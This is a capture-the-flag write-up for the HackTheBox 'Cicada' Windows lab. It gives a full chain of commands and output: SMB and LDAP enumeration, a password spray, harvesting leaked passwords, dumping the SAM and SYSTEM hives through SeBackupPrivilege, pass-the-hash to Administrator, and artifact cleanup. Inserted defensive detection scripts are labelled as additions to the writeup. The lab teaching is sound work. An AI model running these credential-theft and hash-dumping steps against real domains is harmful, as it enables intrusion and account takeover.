HackTheBox Cicada

Writeup for HackTheBox Cicada

Machine Synopsis

Cicada is an easy-difficulty Windows machine that focuses on beginner Active Directory enumeration and exploitation. In this machine, players will enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray, and use the SeBackupPrivilege to achieve full system compromise. (Source)

Key exploitation techniques:

  • Active Directory enumeration via nmap and smbclient
  • Sensitive file extraction from open SMB shares
  • Password spraying with collected credentials
  • LDAP enumeration for additional user information
  • SeBackupPrivilege abuse for registry hive backup
  • Offline SAM/SYSTEM hive cracking for NTLM hashes

Enumeration

An nmap scan identified standard Active Directory services (DNS, Kerberos, LDAP, SMB, WSMAN) and confirmed the domain cicada.htb.

❯ nmap -p- --min-rate 10000 10.10.11.35

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
54375/tcp open  unknown

❯ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,54375 -sC -sV 10.10.11.35

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
...
445/tcp   open  microsoft-ds?
...
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

The domain cicada.htb was added to /etc/hosts for proper hostname resolution.

echo -e '10.10.11.35\tcicada.htb' | sudo tee -a /etc/hosts

SMB Share Enumeration & Credential Leak

Anonymous (guest) access to SMB shares was attempted. The HR share was found to be accessible.

❯ smbclient -L //cicada.htb -N # -N for null/guest session
	Sharename       Type      Comment
	---------       ----      -------
	HR              Disk      
	# ... (truncated)

❯ smbclient -N //cicada.htb/HR
smb: \> ls
  Notice from HR.txt
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt ...

The file Notice from HR.txt was downloaded. Its content contained a leaked default password: Cicada$M6Corpb*@Lp#nZp!8.

cat Notice\ from\ HR.txt
# Excerpt from Notice from HR.txt
Your default password is: Cicada$M6Corpb*@Lp#nZp!8

Exploitation

Domain User Enumeration & Password Spray

Domain users were enumerated using nxc smb with rid-brute as guest.

❯ nxc smb cicada.htb -u "guest" -p '' --rid-brute | grep SidTypeUser | awk '{print $6}' | cut -d '\' -f 2 > users.txt

This extracted a list of usernames to users.txt: Administrator, Guest, krbtgt, john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars.

A password spray attack was performed using nxc smb with the collected usernames and the leaked password Cicada$M6Corpb*@Lp#nZp!8.

❯ nxc smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

The password spray was successful for michael.wrightson.
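From the defender's side, the spray above leaves a distinctive trace: one source address failing network logons against many different accounts in a short window, with a single success in the middle. The following is an added detection example (not part of the writeup); it runs over constructed Windows Security 4624/4625-style records, and the attacker address 10.10.14.7 and the timestamps are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Added example (not from the writeup): flags one source trying one password
# against many accounts over SMB, using Security events 4625/4624, logon type 3.
WINDOW = timedelta(minutes=5)
MIN_DISTINCT_USERS = 5

def detect_password_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS):
    """events: dicts with EventID, TimeCreated (ISO 8601), TargetUserName,
    IpAddress, LogonType. Returns one alert per source IP whose network-logon
    failures cover >= min_users distinct accounts inside `window`, plus any
    accounts that succeeded from that IP in the same window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["LogonType"] == 3 and e["EventID"] in (4624, 4625):
            by_ip[e["IpAddress"]].append(dict(e, ts=datetime.fromisoformat(e["TimeCreated"])))
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["EventID"] == 4625]
        for i, first in enumerate(failures):
            in_window = [e for e in failures[i:] if e["ts"] - first["ts"] <= window]
            users = {e["TargetUserName"].lower() for e in in_window}
            if len(users) < min_users:
                continue
            successes = sorted({e["TargetUserName"] for e in evs
                                if e["EventID"] == 4624
                                and timedelta(0) <= e["ts"] - first["ts"] <= window})
            alerts.append({"source": ip, "first_seen": first["TimeCreated"],
                           "failed_users": sorted(users), "successes": successes})
            break  # one alert per source IP is enough
    return alerts

def _ev(eid, t, user, ip):
    return {"EventID": eid, "TimeCreated": f"2024-09-28T12:00:{t:02d}",
            "TargetUserName": user, "IpAddress": ip, "LogonType": 3}

# Constructed sample: 10.10.14.7 (assumed attacker host) sprays the RID-bruted
# user list and michael.wrightson succeeds; 10.10.11.50 is one unrelated typo.
SAMPLE_EVENTS = [
    _ev(4625, 1, "Administrator", "10.10.14.7"),
    _ev(4625, 2, "Guest", "10.10.14.7"),
    _ev(4625, 3, "krbtgt", "10.10.14.7"),
    _ev(4625, 4, "john.smoulder", "10.10.14.7"),
    _ev(4625, 5, "sarah.dantelia", "10.10.14.7"),
    _ev(4624, 6, "michael.wrightson", "10.10.14.7"),
    _ev(4625, 7, "david.orelious", "10.10.14.7"),
    _ev(4625, 8, "emily.oscars", "10.10.14.7"),
    _ev(4625, 9, "john.smoulder", "10.10.11.50"),
]
```

Running `detect_password_spray(SAMPLE_EVENTS)` yields a single alert for 10.10.14.7 listing all seven sprayed accounts and michael.wrightson as the success.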

LDAP Enumeration & Further Credential Discovery

nxc ldap was used with michael.wrightson’s credentials to perform detailed LDAP enumeration.

❯ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
LDAP        10.10.11.35     389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Description-
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                Just in case I forget my password is aRt$Lp#7t*VQ!3

The description for david.orelious contained a plaintext password: aRt$Lp#7t*VQ!3.

Lateral Movement: DEV Share & emily.oscars Credentials

The credentials for david.orelious were used to access the DEV SMB share.

❯ smbclient //cicada.htb/DEV -U 'david.orelious'
smb: \> ls
  Backup_script.ps1
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 ...

The Backup_script.ps1 file was downloaded.

cat Backup_script.ps1
# Excerpt from Backup_script.ps1
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

The script contained a hardcoded password Q!3@Lp#M6b*7t*Vt for user emily.oscars.
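All three credentials on this box were recovered from text an administrator can audit: the HR notice on an open share, the description attribute of david.orelious, and the hardcoded PSCredential in Backup_script.ps1. The scanner below is an added example (not from the writeup) that checks user descriptions and share file contents for those patterns; the regexes and the sample entries are constructed and would be tuned per environment.

```python
import re

# Added example (not from the writeup): scans the two places this box leaked
# credentials, AD user description attributes and files on readable shares,
# for password-like text. The patterns are assumptions to tune per environment.
CRED_PATTERNS = [
    # free-text notes: "Your default password is: X", "my password is X"
    re.compile(r"\bpassword\s+is\s*:?\s*(\S+)", re.IGNORECASE),
    # hardcoded PowerShell secrets: ConvertTo-SecureString "X" -AsPlainText
    re.compile(r'ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText', re.IGNORECASE),
    # quoted assignments: password = "X", pwd: 'X'
    re.compile(r"\b(?:password|passwd|pwd)\s*[=:]\s*['\"]([^'\"]+)['\"]", re.IGNORECASE),
]

def find_credentials(text):
    """Return candidate secrets found in text (empty list when clean)."""
    hits = []
    for pat in CRED_PATTERNS:
        hits.extend(m.group(1) for m in pat.finditer(text or ""))
    return hits

def scan_user_descriptions(entries):
    """entries: (sAMAccountName, description) pairs, e.g. the result of an LDAP
    search for (&(objectClass=user)(description=*)). Returns {user: [secrets]}."""
    return {sam: hits for sam, desc in entries if (hits := find_credentials(desc))}

def scan_share_files(files):
    """files: {share-relative path: text content}. Returns {path: [secrets]}."""
    return {path: hits for path, text in files.items() if (hits := find_credentials(text))}

# Constructed samples that mirror the writeup's findings.
SAMPLE_DESCRIPTIONS = [
    ("michael.wrightson", None),
    ("david.orelious", "Just in case I forget my password is aRt$Lp#7t*VQ!3"),
    ("emily.oscars", "Finance team"),
]
SAMPLE_FILES = {
    "HR/Notice from HR.txt": "Your default password is: Cicada$M6Corpb*@Lp#nZp!8",
    "DEV/Backup_script.ps1": '$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force',
}
```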

The credentials for emily.oscars were used to establish a WinRM session.

❯ evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
e35ed9c05bc36ad168eedb0c9c424cf2

The user.txt flag was retrieved.

Privilege Escalation: SeBackupPrivilege Abuse

From emily.oscars’s session, whoami /all was executed to enumerate user privileges.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
# ... (truncated)

emily.oscars had SeBackupPrivilege and SeRestorePrivilege enabled. Both are granted by default to members of the Backup Operators group. SeBackupPrivilege lets a process read any file or registry key regardless of its ACL, so it can be abused to copy the Security Account Manager (SAM) and SYSTEM registry hives; together these yield the local account password hashes, since SYSTEM holds the boot key needed to decrypt the SAM.

Dumping SAM & SYSTEM Hives

The reg save command, leveraging SeBackupPrivilege, was used to save copies of the SAM and SYSTEM registry hives to a writable directory (C:\Temp).

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> mkdir C:\Temp
*Evil-WinRM* PS C:\> cd Temp
*Evil-WinRM* PS C:\Temp> reg save hklm\sam C:\Temp\SAM
The operation completed successfully.
*Evil-WinRM* PS C:\Temp> reg save hklm\system C:\Temp\System
The operation completed successfully.
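The two reg save commands above are exactly what process-creation telemetry should catch. The following added hunting example (not from the writeup) walks constructed Sysmon Event ID 1-style records and flags reg.exe saving or exporting the SAM, SYSTEM or SECURITY hives; the sample paths and the backupsvc account are made up, and the field names follow Sysmon's.

```python
import re
from pathlib import PureWindowsPath

# Added example (not from the writeup): hunts process-creation telemetry
# (Sysmon Event ID 1 style records) for reg.exe saving or exporting the SAM,
# SYSTEM or SECURITY hives, the action SeBackupPrivilege enabled above.
# Matching is done on the command line because the image can be renamed.
HIVE_DUMP = re.compile(
    r'\breg(?:\.exe)?"?\s+(save|export)\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.IGNORECASE)

def classify_reg_event(event):
    """Return a finding dict if the event is a sensitive hive dump, else None."""
    m = HIVE_DUMP.search(event.get("CommandLine", ""))
    if not m:
        return None
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    return {
        "user": event.get("User", "?"),
        "action": m.group(1).lower(),
        "hive": m.group(2).lower(),
        # wsmprovhost.exe is the WinRM host process, so the command came from a
        # remote PowerShell session such as the evil-winrm shell in the writeup.
        "remote_session": parent == "wsmprovhost.exe",
        "command": event["CommandLine"],
    }

def hunt_hive_dumps(events):
    return [f for f in map(classify_reg_event, events) if f]

# Constructed sample telemetry; paths and the backupsvc account are made up.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'"C:\Windows\system32\reg.exe" save hklm\sam C:\Temp\SAM',
     "User": r"CICADA\emily.oscars", "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'"C:\Windows\system32\reg.exe" save hklm\system C:\Temp\System',
     "User": r"CICADA\emily.oscars", "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",  # benign query, must not be flagged
     "CommandLine": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion",
     "User": r"CICADA\john.smoulder", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",  # long-form key name, local console
     "CommandLine": r"reg export HKEY_LOCAL_MACHINE\SECURITY C:\Users\Public\sec.reg",
     "User": r"CICADA\backupsvc", "ParentImage": r"C:\Windows\System32\cmd.exe"},
]
```

`hunt_hive_dumps(SAMPLE_EVENTS)` returns three findings (sam, system, security) and skips the query; the first two are marked as coming from a remote session.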

The saved SAM and SYSTEM files were then downloaded to the attacker machine using evil-winrm’s download command.

*Evil-WinRM* PS C:\Temp> download SAM
Info: Downloading C:\Temp\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download SYSTEM
Info: Downloading C:\Temp\SYSTEM to SYSTEM
Info: Download successful!

Offline Hash Extraction

pypykatz was used on the attacker machine to extract NTLM hashes from the downloaded SAM and SYSTEM hives.

❯ /usr/bin/pypykatz registry --sam SAM SYSTEM
============== SYSTEM hive secrets ==============
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

The NTLM hash for the Administrator account was extracted: 2b87e7c93a3e8a0ea4a581937016f341.

Alternative Hash Extraction:

impacket-secretsdump can also be used to extract hashes from offline SAM/SYSTEM hives.

❯ impacket-secretsdump -sam SAM -system SYSTEM local

Administrator Access

The Administrator’s NTLM hash was used to establish a WinRM session.

❯ evil-winrm -i cicada.htb -u administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
9974b4993142309c73bbcb08044b4154

Cleanup

To maintain operational security, any artifacts left on the target system should be removed.

# On target machine as Administrator
*Evil-WinRM* PS C:\> rm C:\Temp\SAM, C:\Temp\System # Remove the saved hive files
*Evil-WinRM* PS C:\> rmdir C:\Temp # Remove the temporary directory

This post is licensed under CC BY 4.0 by the author.